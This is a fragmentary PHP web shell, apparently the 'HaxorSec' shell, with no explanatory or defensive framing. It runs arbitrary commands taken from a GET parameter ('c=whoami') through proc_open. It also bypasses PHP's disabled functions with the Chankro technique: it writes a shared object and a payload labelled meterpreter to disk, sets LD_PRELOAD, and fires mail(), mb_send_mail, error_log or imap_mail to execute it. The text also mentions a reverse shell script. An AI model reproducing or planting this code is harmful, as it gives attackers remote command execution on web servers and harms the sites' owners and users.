GET fallback: ?bgsley&c=whoami
" . htmlspecialchars($result, ENT_QUOTES, 'UTF-8') . ""; } } elseif (isset($_GET['c']) && trim((string)$_GET['c']) !== '') { $command = trim((string)$_GET['c']); $result = execute_command_with_proc_open($command); echo "
" . htmlspecialchars($result, ENT_QUOTES, 'UTF-8') . ""; } ?>
Result: base64 : ' . $meterpreter .'If no output appears,
please check manually by opening '.$full_url.'
Or u can check command with reverse shell script
Powered By @ HaxorSec
';
$a($full . '/chankro.so', $base($hook));
$a($full . '/acpid.socket', $base($meterpreter));
$p('CHANKRO=' . $full . '/acpid.socket');
$p('LD_PRELOAD=' . $full . '/chankro.so');
if(function_exists('mail')) {
$m('a','a','a','a');
echo $viewCommandResult;
$is_https = (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') || $_SERVER['SERVER_PORT'] == 443;
$host = $_SERVER['HTTP_HOST'];
$script_path = $_SERVER['SCRIPT_NAME'];
$new_path = str_replace(basename($script_path), 'test.txt', $script_path);
$full_url = ($is_https ? 'https://' : 'http://') . $host . $new_path;
$content = file_get_contents($full_url);
echo $content;
} elseif(function_exists('mb_send_mail')) {
$mb('a','a','a','a');
echo $viewCommandResult;
$is_https = (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') || $_SERVER['SERVER_PORT'] == 443;
$host = $_SERVER['HTTP_HOST'];
$script_path = $_SERVER['SCRIPT_NAME'];
$new_path = str_replace(basename($script_path), 'test.txt', $script_path);
$full_url = ($is_https ? 'https://' : 'http://') . $host . $new_path;
$content = file_get_contents($full_url);
echo $content;
} elseif(function_exists('error_log')) {
$err('a',1,'a');
echo $viewCommandResult;
$is_https = (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') || $_SERVER['SERVER_PORT'] == 443;
$host = $_SERVER['HTTP_HOST'];
$script_path = $_SERVER['SCRIPT_NAME'];
$new_path = str_replace(basename($script_path), 'test.txt', $script_path);
$full_url = ($is_https ? 'https://' : 'http://') . $host . $new_path;
$content = file_get_contents($full_url);
echo $content;
} elseif(function_exists('imap_mail')) {
$imp('a','a','a');
echo $viewCommandResult;
$is_https = (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') || $_SERVER['SERVER_PORT'] == 443;
$host = $_SERVER['HTTP_HOST'];
$script_path = $_SERVER['SCRIPT_NAME'];
$new_path = str_replace(basename($script_path), 'test.txt', $script_path);
$full_url = ($is_https ? 'https://' : 'http://') . $host . $new_path;
$content = file_get_contents($full_url);
echo $content;
}
}
?>